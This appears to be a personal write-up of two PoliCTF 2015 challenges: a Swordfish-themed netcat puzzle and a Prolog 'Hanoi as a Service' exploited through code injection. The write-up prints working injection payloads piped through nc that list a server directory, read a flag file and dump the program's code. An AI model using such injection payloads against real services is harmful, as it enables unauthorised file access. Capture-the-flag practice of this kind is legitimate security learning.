Poli CTF 2015
PoliCTF is a 48 hour, jeopardy style capture-the-flag competition that will be held both online and live for a restricted number of participants attending the DIMVA 2015 conference held in Milan (Italy). This is the first time I have competed in this CTF, and i'd like to say thank you to the team who put these challenges together!
This is the first CTF I have done in quite a while, so suffice to say I am currently out of practice and overthought many of the challenges. However I still had heaps of fun, and i'm looking forward to practicing for the next CTF!
Challenge Writeups
Hard Interview - 50 Points
This challenge was a great lesson in learning about not overthinking easy challenges and knowing your cheesy hacker movies.
So we start off with this:
Visit the address through your browser, and you'll receive a page that only displays the following text:
____ __ __
/\ _`\ /\ \__ /\ \__
\ \ \/\ \ __ _____ __ _ __\ \ ,_\ ___ ___ __ ___\ \ ,_\
\ \ \ \ \ /'__`\/\ '__`\ /'__`\ /\`'__\ \ \/ /' __` __`\ /'__`\/' _ `\ \ \/
\ \ \_\ \/\ __/\ \ \L\ \/\ \L\.\_\ \ \/ \ \ \_/\ \/\ \/\ \/\ __//\ \/\ \ \ \_
\ \____/\ \____\\ \ ,__/\ \__/.\_\\ \_\ \ \__\ \_\ \_\ \_\ \____\ \_\ \_\ \__\
\/___/ \/____/ \ \ \/ \/__/\/_/ \/_/ \/__/\/_/\/_/\/_/\/____/\/_/\/_/\/__/
\ \_\
___ ____ ___
/'___\ /\ _`\ /'___\
___ /\ \__/ \ \ \/\ \ __ /\ \__/ __ ___ ____ __
/ __`\ \ ,__\ \ \ \ \ \ /'__`\ \ ,__\/'__`\/' _ `\ /',__\ /'__`\
/\ \L\ \ \ \_/ \ \ \_\ \/\ __/\ \ \_/\ __//\ \/\ \/\__, `\/\ __/
\ \____/\ \_\ \ \____/\ \____\\ \_\\ \____\ \_\ \_\/\____/\ \____\
\/___/ \/_/ \/___/ \/____/ \/_/ \/____/\/_/\/_/\/___/ \/____/
____ ____ ____ ___ ____ _ ____ ___ ____ ___ ____ ____ ____ ____ ____ ____ ____ _ _ _ _ _
|__/ |___ [__ | |__/ | | | |___ | \ |__| | | |___ [__ [__ | | |\ | | \_/
| \ |___ ___] | | \ | |___ | |___ |__/ | | |___ |___ |___ ___] ___] |__| | \| |___ |
fish@sword:~$ GET: command not found
fish@sword:~$ Host:: command not found
fish@sword:~$ Connection:: command not found
fish@sword:~$ Accept:: command not found
fish@sword:~$ User-Agent:: command not found
fish@sword:~$ Accept-Encoding:: command not found
fish@sword:~$ Accept-Language:: command not found
: command not found
The browser's HTTP request being entered as commands is a fairly good indication that we need something more appropriate to access this system. Netcat would handle connecting to port 80 nicely.
nc interview.polictf.it 80
Attempting any of the traditional bash commands will result in "command not found".
fish@sword:~$ ls
ls: command not found
After a slew of failed commands, the solution was much more simple - typing in "help" was surprisingly helpful!
fish@sword:~$ help
A very hard interview: Codename Blow...Fish
Maybe you can help me with something...
DOD d-base, 128 bit encryption...What do you think?
Maybe slide in a Trojan hose hiding a worm...
I have been told that best "crackers" in the world can do it in 60 minutes, unfortunately I need someone who can do it in 60 seconds... naturally with the right incentives ;)
If you know what I mean, tell me how a real cracker accesses to a remote super protected server...
Possible commands:
hacker: Write code as a real hacker
help: Give information about the program
hint: Gives a little hint
exit: Loser...bye bye
ssh: A tiny ssh command
date: A very useful and innovative feature
The hacker command will literally print out "hacker" code to the screen as if it was being typed by you! And the date command simply prints a date. Hint provides you with:
useage: ssh username@address
address: a not so easily reachable IP address
Very simple...isn't it?
If you haven't picked it up already, this challenge is based around the interview scene in the movie Swordfish . I brought up a video of the interview scene on YouTube and watched it. After alot of pausing and squinting, I realised that there is an IP address that looks fairly out of place, and I entered the typical username I would expect we were trying to access...
fish@sword:~$ ssh admin@312.5.125.233
And Success!
Hanoi as a Service - 50 Points
I really enjoyed this challenge as I learned alot from it. It was also the first time that I have encounted the programming language Prolog as well techniques on how to approach these types of challenges.
HANOI AS A SERVICE 50 Points Check out our shiny new HaaS platform! nc haas.polictf.it 80
When you netcat into the service you recieve the following message:
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
Lets enter the number 3.
* Move top disk from a to b
* Move top disk from a to b
* Move top disk from a to b
* Move top disk from a to b
* Move top disk from a to b
* Move top disk from a to b
* Move top disk from a to b
This would be a nifty service if we were looking to play Tower of Hanoi, however we want to see how we can attack this service to find the flag.
Lets try some unexpected input, I entered the letter "w", which returned:
ERROR: Prolog initialisation failed:
ERROR: </2 Arithmetic: 'w/0' is not a function
Interesting! Prolog is a general purpose logic programming language, a quick google search reveals a handy list of commands to try. Some of the unsuccessful approaches I tried were: - Attempting to overflow the process by providing it with large input, however the code we dumped later showed that it had been coded to avoid processing input larger than 15 characters long. - Certain commands, such as 'shell()' were rejected with a one of three random messages, such as "Nope.", "What are you trying to do!?!" and "Sorry thats not implemented!".
After some failed commands revealed the directory structure, this allowed me to focus my efforts on reaching the folders above, as it would likely be where the flag was hidden.
root@kali:~# nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
2), debug 2 ?- trace
ERROR: Prolog initialisation failed:
ERROR: Syntax error: Operator expected
ERROR: hanoi(2), debug
ERROR: ** here **
ERROR: 2 ?- trace) .
Exception in thread Thread-1 (most likely raised during interpreter shutdown):
Traceback (most recent call last):
File "/usr/lib/python2.7/threading.py", line 810, in __bootstrap_inner
File "/usr/lib/python2.7/threading.py", line 763, in run
File "/home/ctf/haas/haas-proxy.py", line 36, in listen
File "/usr/lib/python2.7/subprocess.py", line 796, in communicate
File "/usr/lib/python2.7/subprocess.py", line 1376, in wait
File "/usr/lib/python2.7/subprocess.py", line 476, in _eintr_retry_call
<type 'exceptions.OSError'>: [Errno 10] No child processes
The 'working_directory' command seemed like the best command to try here...
echo '2), working_directory(CWD, "/home/ctf/haas/"), ls %'|nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
* Move top disk from a to c
* Move top disk from a to b
* Move top disk from c to b
haas haas-proxy.py jhknsjdfhef_flag_here
This is fantastic - the flag is most likely sitting right there in that folder. After much reading and trial and error, the final command was crafted:
echo '2), open("/home/ctf/haas/jhknsjdfhef_flag_here", read, Stream), read_line_to_codes(Stream,Codes), write(Codes) %'|nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
* Move top disk from a to c
* Move top disk from a to b
* Move top disk from c to b
ERROR: Prolog initialisation failed:
ERROR: open/3: source_sink '[47,104,111,109,101,47,99,116,102,47,104,97,97,115,47,106,104,107,110,115,106,100,114,104,101,102,95,102,108,97,103,95,104,101,114,101]' does not exist (No such file or directory)
After converting the flag from decimal to ascii the flag was revealed!
For those who are interested, here is the code I was able to dump that was running "hanoi()".
root@kali:~# echo '2), listing %'|nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
* Move top disk from a to c
* Move top disk from a to b
* Move top disk from c to b
dohanoi(0, _, _, _) :- !.
dohanoi(A, C, E, D) :- !,
B is A+ -1,
dohanoi(B, C, D, E),
moveit(C, E),
dohanoi(B, D, E, C).
hanoi(A) :-
dohanoi(A, a, b, c).
hanoi(A) :-
write('Hey, this problem is too big for my poor mind...'),
:- multifile prolog_clause_name/2.
:- dynamic prolog_exception_hook/4.
:- multifile prolog_exception_hook/4.
prolog_exception_hook(error(A, context(D, B)), error(A, context(prolog_stack(I), B)), G, C) :-
( ( C==none
-> stack_guard(none)
; prolog_frame_attribute(C, predicate_indicator, E),
'Got exception ~p (Ctx0=~p, Catcher=~p)',
[A, D, E]),
( current_prolog_flag(backtrace_depth, F)
-> F>0
; F=20
get_prolog_backtrace(G, F, H),
debug(backtrace, 'Stack = ~p', [H]),
clean_stack(H, I)
:- dynamic resource/3.
:- multifile resource/3.
first(A, [A|_]).
:- multifile prolog_list_goal/1.
:- thread_local thread_message_hook/3.
:- dynamic thread_message_hook/3.
:- volatile thread_message_hook/3.
:- multifile prolog_predicate_name/2.
moveit(A, B) :-
print('* Move top disk from '),
print(' to '),
main :-
A=[104, 97, 110, 111, 105, 40],
write('Welcome to the Hanoi-as-a-Service cloud platform!'),
write('How many disks does your tower have?'),
read_line_to_codes(user_input, B),
append(A, B, C),
append(C, D, E),
string_to_atom(E, F),
read_term_from_atom(F, G, []),
:- multifile message_property/2.